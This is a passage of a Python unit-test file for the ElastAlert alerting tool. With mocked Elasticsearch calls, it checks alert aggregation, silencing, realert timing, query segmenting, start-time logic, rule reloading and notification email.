ea.rules[0]['aggregation'] = datetime.timedelta(minutes=10)
ea.rules[0]['type'].matches = [{'@timestamp': hit1},
{'@timestamp': hit2},
{'@timestamp': hit3}]
ea.writeback_es.index.side_effect = elasticsearch.exceptions.ElasticsearchException('Nope')
with mock.patch('elastalert.elastalert.elasticsearch_client'):
with mock.patch.object(ea, 'find_pending_aggregate_alert', return_value=None):
ea.run_rule(ea.rules[0], END, START)
assert ea.rules[0]['agg_matches'] == [{'@timestamp': hit1, 'num_hits': 0, 'num_matches': 3},
{'@timestamp': hit2, 'num_hits': 0, 'num_matches': 3},
{'@timestamp': hit3, 'num_hits': 0, 'num_matches': 3}]
ea.thread_data.current_es.search.return_value = {'hits': {'total': 0, 'hits': []}}
ea.add_aggregated_alert = mock.Mock()
with mock.patch.object(ea, 'run_query'):
ea.run_rule(ea.rules[0], END, START)
ea.add_aggregated_alert.assert_any_call({'@timestamp': hit1, 'num_hits': 0, 'num_matches': 3}, ea.rules[0])
ea.add_aggregated_alert.assert_any_call({'@timestamp': hit2, 'num_hits': 0, 'num_matches': 3}, ea.rules[0])
ea.add_aggregated_alert.assert_any_call({'@timestamp': hit3, 'num_hits': 0, 'num_matches': 3}, ea.rules[0])
def test_agg_with_aggregation_key(ea):
ea.max_aggregation = 1337
hits_timestamps = ['2014-09-26T12:34:45', '2014-09-26T12:40:45', '2014-09-26T12:43:45']
match_time = ts_to_dt('2014-09-26T12:45:00Z')
hits = generate_hits(hits_timestamps)
ea.thread_data.current_es.search.return_value = hits
with mock.patch('elastalert.elastalert.elasticsearch_client') as mock_es:
mock_es.return_value = ea.thread_data.current_es
with mock.patch('elastalert.elastalert.ts_now', return_value=match_time):
ea.rules[0]['aggregation'] = datetime.timedelta(minutes=10)
ea.rules[0]['type'].matches = [{'@timestamp': h} for h in hits_timestamps]
# Hit1 and Hit3 should be aggregated together, since they have same query_key value
ea.rules[0]['type'].matches[0]['key'] = 'Key Value 1'
ea.rules[0]['type'].matches[1]['key'] = 'Key Value 2'
ea.rules[0]['type'].matches[2]['key'] = 'Key Value 1'
ea.rules[0]['aggregation_key'] = 'key'
ea.run_rule(ea.rules[0], END, START)
# Assert that the three matches were added to elasticsearch
call1 = ea.writeback_es.index.call_args_list[0][1]['body']
call2 = ea.writeback_es.index.call_args_list[1][1]['body']
call3 = ea.writeback_es.index.call_args_list[2][1]['body']
assert call1['match_body']['key'] == 'Key Value 1'
assert not call1['alert_sent']
assert 'aggregate_id' not in call1
assert 'aggregation_key' in call1
assert call1['aggregation_key'] == 'Key Value 1'
assert call1['alert_time'] == dt_to_ts(match_time + datetime.timedelta(minutes=10))
assert call2['match_body']['key'] == 'Key Value 2'
assert not call2['alert_sent']
assert 'aggregate_id' not in call2
assert 'aggregation_key' in call2
assert call2['aggregation_key'] == 'Key Value 2'
assert call2['alert_time'] == dt_to_ts(match_time + datetime.timedelta(minutes=10))
assert call3['match_body']['key'] == 'Key Value 1'
assert not call3['alert_sent']
# Call3 should have it's aggregate_id set to call1's _id
# It should also have the same alert_time as call1
assert call3['aggregate_id'] == 'ABCD'
assert 'aggregation_key' in call3
assert call3['aggregation_key'] == 'Key Value 1'
assert call3['alert_time'] == dt_to_ts(match_time + datetime.timedelta(minutes=10))
# First call - Find all pending alerts (only entries without agg_id)
# Second call - Find matches with agg_id == 'ABCD'
# Third call - Find matches with agg_id == 'CDEF'
ea.writeback_es.deprecated_search.side_effect = [{'hits': {'hits': [{'_id': 'ABCD', '_index': 'wb', '_source': call1},
{'_id': 'CDEF', '_index': 'wb', '_source': call2}]}},
{'hits': {'hits': [{'_id': 'BCDE', '_index': 'wb', '_source': call3}]}},
{'hits': {'total': 0, 'hits': []}}]
with mock.patch('elastalert.elastalert.elasticsearch_client') as mock_es:
mock_es.return_value = ea.thread_data.current_es
ea.send_pending_alerts()
# Assert that current_es was refreshed from the aggregate rules
assert mock_es.called_with(host='', port='')
assert mock_es.call_count == 2
assert_alerts(ea, [[hits_timestamps[0], hits_timestamps[2]], [hits_timestamps[1]]])
call1 = ea.writeback_es.deprecated_search.call_args_list[7][1]['body']
call2 = ea.writeback_es.deprecated_search.call_args_list[8][1]['body']
call3 = ea.writeback_es.deprecated_search.call_args_list[9][1]['body']
call4 = ea.writeback_es.deprecated_search.call_args_list[10][1]['body']
assert 'alert_time' in call2['filter']['range']
assert call3['query']['query_string']['query'] == 'aggregate_id:ABCD'
assert call4['query']['query_string']['query'] == 'aggregate_id:CDEF'
assert ea.writeback_es.deprecated_search.call_args_list[9][1]['size'] == 1337
def test_silence(ea):
# Silence test rule for 4 hours
ea.args.rule = 'test_rule.yaml' # Not a real name, just has to be set
ea.args.silence = 'hours=4'
ea.silence()
# Don't alert even with a match
match = [{'@timestamp': '2014-11-17T00:00:00'}]
ea.rules[0]['type'].matches = match
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.run_rule(ea.rules[0], END, START)
assert ea.rules[0]['alert'][0].alert.call_count == 0
# Mock ts_now() to +5 hours, alert on match
match = [{'@timestamp': '2014-11-17T00:00:00'}]
ea.rules[0]['type'].matches = match
with mock.patch('elastalert.elastalert.ts_now') as mock_ts:
with mock.patch('elastalert.elastalert.elasticsearch_client'):
# Converted twice to add tzinfo
mock_ts.return_value = ts_to_dt(dt_to_ts(datetime.datetime.utcnow() + datetime.timedelta(hours=5)))
ea.run_rule(ea.rules[0], END, START)
assert ea.rules[0]['alert'][0].alert.call_count == 1
def test_compound_query_key(ea):
ea.rules[0]['query_key'] = 'this,that,those'
ea.rules[0]['compound_query_key'] = ['this', 'that', 'those']
hits = generate_hits([START_TIMESTAMP, END_TIMESTAMP], this='abc', that='☃', those=4)
ea.thread_data.current_es.search.return_value = hits
ea.run_query(ea.rules[0], START, END)
call_args = ea.rules[0]['type'].add_data.call_args_list[0]
assert 'this,that,those' in call_args[0][0][0]
assert call_args[0][0][0]['this,that,those'] == 'abc, ☃, 4'
def test_silence_query_key(ea):
# Silence test rule for 4 hours
ea.args.rule = 'test_rule.yaml' # Not a real name, just has to be set
ea.args.silence = 'hours=4'
ea.silence('anytest.qlo')
# Don't alert even with a match
match = [{'@timestamp': '2014-11-17T00:00:00', 'username': 'qlo'}]
ea.rules[0]['type'].matches = match
ea.rules[0]['query_key'] = 'username'
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.run_rule(ea.rules[0], END, START)
assert ea.rules[0]['alert'][0].alert.call_count == 0
# If there is a new record with a different value for the query_key, we should get an alert
match = [{'@timestamp': '2014-11-17T00:00:01', 'username': 'dpopes'}]
ea.rules[0]['type'].matches = match
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.run_rule(ea.rules[0], END, START)
assert ea.rules[0]['alert'][0].alert.call_count == 1
# Mock ts_now() to +5 hours, alert on match
match = [{'@timestamp': '2014-11-17T00:00:00', 'username': 'qlo'}]
ea.rules[0]['type'].matches = match
with mock.patch('elastalert.elastalert.ts_now') as mock_ts:
with mock.patch('elastalert.elastalert.elasticsearch_client'):
# Converted twice to add tzinfo
mock_ts.return_value = ts_to_dt(dt_to_ts(datetime.datetime.utcnow() + datetime.timedelta(hours=5)))
ea.run_rule(ea.rules[0], END, START)
assert ea.rules[0]['alert'][0].alert.call_count == 2
def test_realert(ea):
hits = ['2014-09-26T12:35:%sZ' % (x) for x in range(60)]
matches = [{'@timestamp': x} for x in hits]
ea.thread_data.current_es.search.return_value = hits
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.rules[0]['realert'] = datetime.timedelta(seconds=50)
ea.rules[0]['type'].matches = matches
ea.run_rule(ea.rules[0], END, START)
assert ea.rules[0]['alert'][0].alert.call_count == 1
# Doesn't alert again
matches = [{'@timestamp': x} for x in hits]
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.run_rule(ea.rules[0], END, START)
ea.rules[0]['type'].matches = matches
assert ea.rules[0]['alert'][0].alert.call_count == 1
# mock ts_now() to past the realert time
matches = [{'@timestamp': hits[0]}]
with mock.patch('elastalert.elastalert.ts_now') as mock_ts:
with mock.patch('elastalert.elastalert.elasticsearch_client'):
# mock_ts is converted twice to add tzinfo
mock_ts.return_value = ts_to_dt(dt_to_ts(datetime.datetime.utcnow() + datetime.timedelta(minutes=10)))
ea.rules[0]['type'].matches = matches
ea.run_rule(ea.rules[0], END, START)
assert ea.rules[0]['alert'][0].alert.call_count == 2
def test_realert_with_query_key(ea):
ea.rules[0]['query_key'] = 'username'
ea.rules[0]['realert'] = datetime.timedelta(minutes=10)
# Alert and silence username: qlo
match = [{'@timestamp': '2014-11-17T00:00:00', 'username': 'qlo'}]
ea.rules[0]['type'].matches = match
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.run_rule(ea.rules[0], END, START)
assert ea.rules[0]['alert'][0].alert.call_count == 1
# Dont alert again for same username
match = [{'@timestamp': '2014-11-17T00:05:00', 'username': 'qlo'}]
ea.rules[0]['type'].matches = match
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.run_rule(ea.rules[0], END, START)
assert ea.rules[0]['alert'][0].alert.call_count == 1
# Do alert with a different value
match = [{'@timestamp': '2014-11-17T00:05:00', 'username': ''}]
ea.rules[0]['type'].matches = match
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.run_rule(ea.rules[0], END, START)
assert ea.rules[0]['alert'][0].alert.call_count == 2
# Alert with query_key missing
match = [{'@timestamp': '2014-11-17T00:05:00'}]
ea.rules[0]['type'].matches = match
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.run_rule(ea.rules[0], END, START)
assert ea.rules[0]['alert'][0].alert.call_count == 3
# Still alert with a different value
match = [{'@timestamp': '2014-11-17T00:05:00', 'username': 'ghengis_khan'}]
ea.rules[0]['type'].matches = match
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.run_rule(ea.rules[0], END, START)
assert ea.rules[0]['alert'][0].alert.call_count == 4
def test_realert_with_nested_query_key(ea):
ea.rules[0]['query_key'] = 'user.name'
ea.rules[0]['realert'] = datetime.timedelta(minutes=10)
# Alert and silence username: qlo
match = [{'@timestamp': '2014-11-17T00:00:00', 'user': {'name': 'qlo'}}]
ea.rules[0]['type'].matches = match
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.run_rule(ea.rules[0], END, START)
assert ea.rules[0]['alert'][0].alert.call_count == 1
# Dont alert again for same username
match = [{'@timestamp': '2014-11-17T00:05:00', 'user': {'name': 'qlo'}}]
ea.rules[0]['type'].matches = match
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.run_rule(ea.rules[0], END, START)
assert ea.rules[0]['alert'][0].alert.call_count == 1
def test_count(ea):
ea.rules[0]['use_count_query'] = True
ea.rules[0]['doc_type'] = 'doctype'
with mock.patch('elastalert.elastalert.elasticsearch_client'), \
mock.patch.object(ea, 'get_hits_count') as mock_hits:
ea.run_rule(ea.rules[0], END, START)
# Assert that es.count is run against every run_every timeframe between START and END
start = START
query = {
'query': {'filtered': {
'filter': {'bool': {'must': [{'range': {'@timestamp': {'lte': END_TIMESTAMP, 'gt': START_TIMESTAMP}}}]}}}}}
while END - start > ea.run_every:
end = start + ea.run_every
query['query']['filtered']['filter']['bool']['must'][0]['range']['@timestamp']['lte'] = dt_to_ts(end)
query['query']['filtered']['filter']['bool']['must'][0]['range']['@timestamp']['gt'] = dt_to_ts(start)
mock_hits.assert_any_call(mock.ANY, start, end, mock.ANY)
start = start + ea.run_every
def run_and_assert_segmented_queries(ea, start, end, segment_size):
with mock.patch.object(ea, 'run_query') as mock_run_query:
ea.run_rule(ea.rules[0], end, start)
original_end, original_start = end, start
for call_args in mock_run_query.call_args_list:
end = min(start + segment_size, original_end)
assert call_args[0][1:3] == (start, end)
start += segment_size
# Assert elastalert_status was created for the entire time range
assert ea.writeback_es.index.call_args_list[-1][1]['body']['starttime'] == dt_to_ts(original_start)
if ea.rules[0].get('aggregation_query_element'):
assert ea.writeback_es.index.call_args_list[-1][1]['body']['endtime'] == dt_to_ts(
original_end - (original_end - end))
assert original_end - end < segment_size
else:
assert ea.writeback_es.index.call_args_list[-1][1]['body']['endtime'] == dt_to_ts(original_end)
def test_query_segmenting_reset_num_hits(ea):
# Tests that num_hits gets reset every time run_query is run
def assert_num_hits_reset():
assert ea.thread_data.num_hits == 0
ea.thread_data.num_hits += 10
with mock.patch.object(ea, 'run_query') as mock_run_query:
mock_run_query.side_effect = assert_num_hits_reset()
ea.run_rule(ea.rules[0], END, START)
assert mock_run_query.call_count > 1
def test_query_segmenting(ea):
# buffer_time segments with normal queries
ea.rules[0]['buffer_time'] = datetime.timedelta(minutes=53)
with mock.patch('elastalert.elastalert.elasticsearch_client'):
run_and_assert_segmented_queries(ea, START, END, ea.rules[0]['buffer_time'])
# run_every segments with count queries
ea.rules[0]['use_count_query'] = True
with mock.patch('elastalert.elastalert.elasticsearch_client'):
run_and_assert_segmented_queries(ea, START, END, ea.run_every)
# run_every segments with terms queries
ea.rules[0].pop('use_count_query')
ea.rules[0]['use_terms_query'] = True
with mock.patch('elastalert.elastalert.elasticsearch_client'):
run_and_assert_segmented_queries(ea, START, END, ea.run_every)
# buffer_time segments with terms queries
ea.rules[0].pop('use_terms_query')
ea.rules[0]['aggregation_query_element'] = {'term': 'term_val'}
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.rules[0]['buffer_time'] = datetime.timedelta(minutes=30)
run_and_assert_segmented_queries(ea, START, END, ea.rules[0]['buffer_time'])
# partial segment size scenario
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.rules[0]['buffer_time'] = datetime.timedelta(minutes=53)
run_and_assert_segmented_queries(ea, START, END, ea.rules[0]['buffer_time'])
# run every segmenting
ea.rules[0]['use_run_every_query_size'] = True
with mock.patch('elastalert.elastalert.elasticsearch_client'):
run_and_assert_segmented_queries(ea, START, END, ea.run_every)
def test_get_starttime(ea):
endtime = '2015-01-01T00:00:00Z'
mock_es = mock.Mock()
mock_es.search.return_value = {'hits': {'hits': [{'_source': {'endtime': endtime}}]}}
mock_es.info.return_value = {'version': {'number': '2.0'}}
ea.writeback_es = mock_es
# 4 days old, will return endtime
with mock.patch('elastalert.elastalert.ts_now') as mock_ts:
mock_ts.return_value = ts_to_dt('2015-01-05T00:00:00Z') # 4 days ahead of the endtime
assert ea.get_starttime(ea.rules[0]) == ts_to_dt(endtime)
# 10 days old, will return None
with mock.patch('elastalert.elastalert.ts_now') as mock_ts:
mock_ts.return_value = ts_to_dt('2015-01-11T00:00:00Z') # 10 days ahead of the endtime
assert ea.get_starttime(ea.rules[0]) is None
def test_set_starttime(ea):
# standard query, no starttime, no last run
end = ts_to_dt('2014-10-10T10:10:10')
with mock.patch.object(ea, 'get_starttime') as mock_gs:
mock_gs.return_value = None
ea.set_starttime(ea.rules[0], end)
assert mock_gs.call_count == 1
assert ea.rules[0]['starttime'] == end - ea.buffer_time
# Standard query, no starttime, rule specific buffer_time
ea.rules[0].pop('starttime')
ea.rules[0]['buffer_time'] = datetime.timedelta(minutes=37)
with mock.patch.object(ea, 'get_starttime') as mock_gs:
mock_gs.return_value = None
ea.set_starttime(ea.rules[0], end)
assert mock_gs.call_count == 1
assert ea.rules[0]['starttime'] == end - datetime.timedelta(minutes=37)
ea.rules[0].pop('buffer_time')
# Standard query, no starttime, last run
ea.rules[0].pop('starttime')
with mock.patch.object(ea, 'get_starttime') as mock_gs:
mock_gs.return_value = ts_to_dt('2014-10-10T00:00:00')
ea.set_starttime(ea.rules[0], end)
assert mock_gs.call_count == 1
assert ea.rules[0]['starttime'] == ts_to_dt('2014-10-10T00:00:00')
# Standard query, no starttime, last run, assure buffer_time doesn't go past
ea.rules[0].pop('starttime')
ea.rules[0]['buffer_time'] = datetime.timedelta(weeks=1000)
with mock.patch.object(ea, 'get_starttime') as mock_gs:
mock_gs.return_value = ts_to_dt('2014-10-09T00:00:00')
# First call sets minumum_time
ea.set_starttime(ea.rules[0], end)
# Second call uses buffer_time, but it goes past minimum
ea.set_starttime(ea.rules[0], end)
assert ea.rules[0]['starttime'] == ts_to_dt('2014-10-09T00:00:00')
# Standard query, starttime
ea.rules[0].pop('buffer_time')
ea.rules[0].pop('minimum_starttime')
with mock.patch.object(ea, 'get_starttime') as mock_gs:
mock_gs.return_value = None
ea.set_starttime(ea.rules[0], end)
assert mock_gs.call_count == 0
assert ea.rules[0]['starttime'] == end - ea.buffer_time
# Count query, starttime, no previous endtime
ea.rules[0]['use_count_query'] = True
ea.rules[0]['doc_type'] = 'blah'
with mock.patch.object(ea, 'get_starttime') as mock_gs:
mock_gs.return_value = None
ea.set_starttime(ea.rules[0], end)
assert mock_gs.call_count == 0
assert ea.rules[0]['starttime'] == end - ea.run_every
# Count query, with previous endtime
with mock.patch('elastalert.elastalert.elasticsearch_client'), \
mock.patch.object(ea, 'get_hits_count'):
ea.run_rule(ea.rules[0], END, START)
ea.set_starttime(ea.rules[0], end)
assert ea.rules[0]['starttime'] == END
# buffer_time doesn't go past previous endtime
ea.rules[0].pop('use_count_query')
ea.rules[0]['previous_endtime'] = end - ea.buffer_time * 2
ea.set_starttime(ea.rules[0], end)
assert ea.rules[0]['starttime'] == ea.rules[0]['previous_endtime']
# Make sure starttime is updated if previous_endtime isn't used
ea.rules[0]['previous_endtime'] = end - ea.buffer_time / 2
ea.rules[0]['starttime'] = ts_to_dt('2014-10-09T00:00:01')
ea.set_starttime(ea.rules[0], end)
assert ea.rules[0]['starttime'] == end - ea.buffer_time
# scan_entire_timeframe
ea.rules[0].pop('previous_endtime')
ea.rules[0].pop('starttime')
ea.rules[0]['timeframe'] = datetime.timedelta(days=3)
ea.rules[0]['scan_entire_timeframe'] = True
with mock.patch.object(ea, 'get_starttime') as mock_gs:
mock_gs.return_value = None
ea.set_starttime(ea.rules[0], end)
assert ea.rules[0]['starttime'] == end - datetime.timedelta(days=3)
def test_kibana_dashboard(ea):
match = {'@timestamp': '2014-10-11T00:00:00'}
mock_es = mock.Mock()
ea.rules[0]['use_kibana_dashboard'] = 'my dashboard'
with mock.patch('elastalert.elastalert.elasticsearch_client') as mock_es_init:
mock_es_init.return_value = mock_es
# No dashboard found
mock_es.deprecated_search.return_value = {'hits': {'total': 0, 'hits': []}}
with pytest.raises(EAException):
ea.use_kibana_link(ea.rules[0], match)
mock_call = mock_es.deprecated_search.call_args_list[0][1]
assert mock_call['body'] == {'query': {'term': {'_id': 'my dashboard'}}}
# Dashboard found
mock_es.index.return_value = {'_id': 'ABCDEFG'}
mock_es.deprecated_search.return_value = {'hits': {'hits': [{'_source': {'dashboard': json.dumps(dashboard_temp)}}]}}
url = ea.use_kibana_link(ea.rules[0], match)
assert 'ABCDEFG' in url
db = json.loads(mock_es.index.call_args_list[0][1]['body']['dashboard'])
assert 'anytest' in db['title']
# Query key filtering added
ea.rules[0]['query_key'] = 'foobar'
match['foobar'] = 'baz'
url = ea.use_kibana_link(ea.rules[0], match)
db = json.loads(mock_es.index.call_args_list[-1][1]['body']['dashboard'])
assert db['services']['filter']['list']['1']['field'] == 'foobar'
assert db['services']['filter']['list']['1']['query'] == '"baz"'
# Compound query key
ea.rules[0]['query_key'] = 'foo,bar'
ea.rules[0]['compound_query_key'] = ['foo', 'bar']
match['foo'] = 'cat'
match['bar'] = 'dog'
match['foo,bar'] = 'cat, dog'
url = ea.use_kibana_link(ea.rules[0], match)
db = json.loads(mock_es.index.call_args_list[-1][1]['body']['dashboard'])
found_filters = 0
for filter_id, filter_dict in list(db['services']['filter']['list'].items()):
if (filter_dict['field'] == 'foo' and filter_dict['query'] == '"cat"') or \
(filter_dict['field'] == 'bar' and filter_dict['query'] == '"dog"'):
found_filters += 1
continue
assert found_filters == 2
def test_rule_changes(ea):
ea.rule_hashes = {'rules/rule1.yaml': 'ABC',
'rules/rule2.yaml': 'DEF'}
run_every = datetime.timedelta(seconds=1)
ea.rules = [ea.init_rule(rule, True) for rule in [{'rule_file': 'rules/rule1.yaml', 'name': 'rule1', 'filter': [],
'run_every': run_every},
{'rule_file': 'rules/rule2.yaml', 'name': 'rule2', 'filter': [],
'run_every': run_every}]]
ea.rules[1]['processed_hits'] = ['save me']
new_hashes = {'rules/rule1.yaml': 'ABC',
'rules/rule3.yaml': 'XXX',
'rules/rule2.yaml': '!@#$'}
with mock.patch.object(ea.conf['rules_loader'], 'get_hashes') as mock_hashes:
with mock.patch.object(ea.conf['rules_loader'], 'load_configuration') as mock_load:
mock_load.side_effect = [{'filter': [], 'name': 'rule2', 'rule_file': 'rules/rule2.yaml', 'run_every': run_every},
{'filter': [], 'name': 'rule3', 'rule_file': 'rules/rule3.yaml', 'run_every': run_every}]
mock_hashes.return_value = new_hashes
ea.load_rule_changes()
# All 3 rules still exist
assert ea.rules[0]['name'] == 'rule1'
assert ea.rules[1]['name'] == 'rule2'
assert ea.rules[1]['processed_hits'] == ['save me']
assert ea.rules[2]['name'] == 'rule3'
# Assert 2 and 3 were reloaded
assert mock_load.call_count == 2
mock_load.assert_any_call('rules/rule2.yaml', ea.conf)
mock_load.assert_any_call('rules/rule3.yaml', ea.conf)
# A new rule with a conflicting name wont load
new_hashes = copy.copy(new_hashes)
new_hashes.update({'rules/rule4.yaml': 'asdf'})
with mock.patch.object(ea.conf['rules_loader'], 'get_hashes') as mock_hashes:
with mock.patch.object(ea.conf['rules_loader'], 'load_configuration') as mock_load:
with mock.patch.object(ea, 'send_notification_email') as mock_send:
mock_load.return_value = {'filter': [], 'name': 'rule3', 'new': 'stuff',
'rule_file': 'rules/rule4.yaml', 'run_every': run_every}
mock_hashes.return_value = new_hashes
ea.load_rule_changes()
mock_send.assert_called_once_with(exception=mock.ANY, rule_file='rules/rule4.yaml')
assert len(ea.rules) == 3
assert not any(['new' in rule for rule in ea.rules])
# A new rule with is_enabled=False wont load
new_hashes = copy.copy(new_hashes)
new_hashes.update({'rules/rule4.yaml': 'asdf'})
with mock.patch.object(ea.conf['rules_loader'], 'get_hashes') as mock_hashes:
with mock.patch.object(ea.conf['rules_loader'], 'load_configuration') as mock_load:
mock_load.return_value = {'filter': [], 'name': 'rule4', 'new': 'stuff', 'is_enabled': False,
'rule_file': 'rules/rule4.yaml', 'run_every': run_every}
mock_hashes.return_value = new_hashes
ea.load_rule_changes()
assert len(ea.rules) == 3
assert not any(['new' in rule for rule in ea.rules])
# An old rule which didn't load gets reloaded
new_hashes = copy.copy(new_hashes)
new_hashes['rules/rule4.yaml'] = 'qwerty'
with mock.patch.object(ea.conf['rules_loader'], 'get_hashes') as mock_hashes:
with mock.patch.object(ea.conf['rules_loader'], 'load_configuration') as mock_load:
mock_load.return_value = {'filter': [], 'name': 'rule4', 'new': 'stuff', 'rule_file': 'rules/rule4.yaml',
'run_every': run_every}
mock_hashes.return_value = new_hashes
ea.load_rule_changes()
assert len(ea.rules) == 4
# Disable a rule by removing the file
new_hashes.pop('rules/rule4.yaml')
with mock.patch.object(ea.conf['rules_loader'], 'get_hashes') as mock_hashes:
with mock.patch.object(ea.conf['rules_loader'], 'load_configuration') as mock_load:
mock_load.return_value = {'filter': [], 'name': 'rule4', 'new': 'stuff', 'rule_file': 'rules/rule4.yaml',
'run_every': run_every}
mock_hashes.return_value = new_hashes
ea.load_rule_changes()
ea.scheduler.remove_job.assert_called_with(job_id='rule4')
def test_strf_index(ea):
""" Test that the get_index function properly generates indexes spanning days """
ea.rules[0]['index'] = 'logstash-%Y.%m.%d'
ea.rules[0]['use_strftime_index'] = True
# Test formatting with times
start = ts_to_dt('2015-01-02T12:34:45Z')
end = ts_to_dt('2015-01-02T16:15:14Z')
assert ea.get_index(ea.rules[0], start, end) == 'logstash-2015.01.02'
end = ts_to_dt('2015-01-03T01:02:03Z')
assert set(ea.get_index(ea.rules[0], start, end).split(',')) == set(['logstash-2015.01.02', 'logstash-2015.01.03'])
# Test formatting for wildcard
assert ea.get_index(ea.rules[0]) == 'logstash-*'
ea.rules[0]['index'] = 'logstash-%Y.%m'
assert ea.get_index(ea.rules[0]) == 'logstash-*'
ea.rules[0]['index'] = 'logstash-%Y.%m-stuff'
assert ea.get_index(ea.rules[0]) == 'logstash-*-stuff'
def test_count_keys(ea):
ea.rules[0]['timeframe'] = datetime.timedelta(minutes=60)
ea.rules[0]['top_count_keys'] = ['this', 'that']
ea.rules[0]['type'].matches = {'@timestamp': END}
ea.rules[0]['doc_type'] = 'blah'
buckets = [{'aggregations': {
'filtered': {'counts': {'buckets': [{'key': 'a', 'doc_count': 10}, {'key': 'b', 'doc_count': 5}]}}}},
{'aggregations': {'filtered': {
'counts': {'buckets': [{'key': 'd', 'doc_count': 10}, {'key': 'c', 'doc_count': 12}]}}}}]
ea.thread_data.current_es.deprecated_search.side_effect = buckets
counts = ea.get_top_counts(ea.rules[0], START, END, ['this', 'that'])
calls = ea.thread_data.current_es.deprecated_search.call_args_list
assert calls[0][1]['search_type'] == 'count'
assert calls[0][1]['body']['aggs']['filtered']['aggs']['counts']['terms'] == {'field': 'this', 'size': 5,
'min_doc_count': 1}
assert counts['top_events_this'] == {'a': 10, 'b': 5}
assert counts['top_events_that'] == {'d': 10, 'c': 12}
def test_exponential_realert(ea):
ea.rules[0]['exponential_realert'] = datetime.timedelta(days=1) # 1 day ~ 10 * 2**13 seconds
ea.rules[0]['realert'] = datetime.timedelta(seconds=10)
until = ts_to_dt('2015-03-24T00:00:00')
ts5s = until + datetime.timedelta(seconds=5)
ts15s = until + datetime.timedelta(seconds=15)
ts1m = until + datetime.timedelta(minutes=1)
ts5m = until + datetime.timedelta(minutes=5)
ts4h = until + datetime.timedelta(hours=4)
test_values = [(ts5s, until, 0), # Exp will increase to 1, 10*2**0 = 10s
(ts15s, until, 0), # Exp will stay at 0, 10*2**0 = 10s
(ts15s, until, 1), # Exp will increase to 2, 10*2**1 = 20s
(ts1m, until, 2), # Exp will decrease to 1, 10*2**2 = 40s
(ts1m, until, 3), # Exp will increase to 4, 10*2**3 = 1m20s
(ts5m, until, 1), # Exp will lower back to 0, 10*2**1 = 20s
(ts4h, until, 9), # Exp will lower back to 0, 10*2**9 = 1h25m
(ts4h, until, 10), # Exp will lower back to 9, 10*2**10 = 2h50m
(ts4h, until, 11)] # Exp will increase to 12, 10*2**11 = 5h
results = (1, 0, 2, 1, 4, 0, 0, 9, 12)
next_res = iter(results)
for args in test_values:
ea.silence_cache[ea.rules[0]['name']] = (args[1], args[2])
next_alert, exponent = ea.next_alert_time(ea.rules[0], ea.rules[0]['name'], args[0])
assert exponent == next(next_res)
def test_wait_until_responsive(ea):
"""Unblock as soon as ElasticSearch becomes responsive."""
# Takes a while before becoming responsive.
ea.writeback_es.indices.exists.side_effect = [
ConnectionError(), # ES is not yet responsive.
False, # index does not yet exist.
True,
]
clock = mock.MagicMock()
clock.side_effect = [0.0, 1.0, 2.0, 3.0, 4.0]
timeout = datetime.timedelta(seconds=3.5)
with mock.patch('time.sleep') as sleep:
ea.wait_until_responsive(timeout=timeout, clock=clock)
# Sleep as little as we can.
sleep.mock_calls == [
mock.call(1.0),
]
def test_wait_until_responsive_timeout_es_not_available(ea, capsys):
"""Bail out if ElasticSearch doesn't (quickly) become responsive."""
# Never becomes responsive :-)
ea.writeback_es.ping.return_value = False
ea.writeback_es.indices.exists.return_value = False
clock = mock.MagicMock()
clock.side_effect = [0.0, 1.0, 2.0, 3.0]
timeout = datetime.timedelta(seconds=2.5)
with mock.patch('time.sleep') as sleep:
with pytest.raises(SystemExit) as exc:
ea.wait_until_responsive(timeout=timeout, clock=clock)
assert exc.value.code == 1
# Ensure we get useful diagnostics.
output, errors = capsys.readouterr()
assert 'Could not reach ElasticSearch at "es:14900".' in errors
# Slept until we passed the deadline.
sleep.mock_calls == [
mock.call(1.0),
mock.call(1.0),
mock.call(1.0),
]
def test_wait_until_responsive_timeout_index_does_not_exist(ea, capsys):
"""Bail out if ElasticSearch doesn't (quickly) become responsive."""
# Never becomes responsive :-)
ea.writeback_es.ping.return_value = True
ea.writeback_es.indices.exists.return_value = False
clock = mock.MagicMock()
clock.side_effect = [0.0, 1.0, 2.0, 3.0]
timeout = datetime.timedelta(seconds=2.5)
with mock.patch('time.sleep') as sleep:
with pytest.raises(SystemExit) as exc:
ea.wait_until_responsive(timeout=timeout, clock=clock)
assert exc.value.code == 1
# Ensure we get useful diagnostics.
output, errors = capsys.readouterr()
assert 'Writeback alias "wb_a" does not exist, did you run `elastalert-create-index`?' in errors
# Slept until we passed the deadline.
sleep.mock_calls == [
mock.call(1.0),
mock.call(1.0),
mock.call(1.0),
]
def test_stop(ea):
""" The purpose of this test is to make sure that calling ElastAlerter.stop() will break it
out of a ElastAlerter.start() loop. This method exists to provide a mechanism for running
ElastAlert with threads and thus must be tested with threads. mock_loop verifies the loop
is running and will call stop after several iterations. """
# Exit the thread on the fourth iteration
def mock_loop():
for i in range(3):
assert ea.running
yield
ea.stop()
with mock.patch.object(ea, 'sleep_for', return_value=None):
with mock.patch.object(ea, 'sleep_for') as mock_run:
mock_run.side_effect = mock_loop()
start_thread = threading.Thread(target=ea.start)
# Set as daemon to prevent a failed test from blocking exit
start_thread.daemon = True
start_thread.start()
# Give it a few seconds to run the loop
start_thread.join(5)
assert not ea.running
assert not start_thread.is_alive()
assert mock_run.call_count == 4
def test_notify_email(ea):
mock_smtp = mock.Mock()
ea.rules[0]['notify_email'] = ['foo@foo.foo', 'bar@bar.bar']
with mock.patch('elastalert.elastalert.SMTP') as mock_smtp_f:
mock_smtp_f.return_value = mock_smtp
# Notify_email from rules, array
ea.send_notification_email('omg', rule=ea.rules[0])
assert set(mock_smtp.sendmail.call_args_list[0][0][1]) == set(ea.rules[0]['notify_email'])
# With ea.notify_email
ea.notify_email = ['baz@baz.baz']
ea.send_notification_email('omg', rule=ea.rules[0])
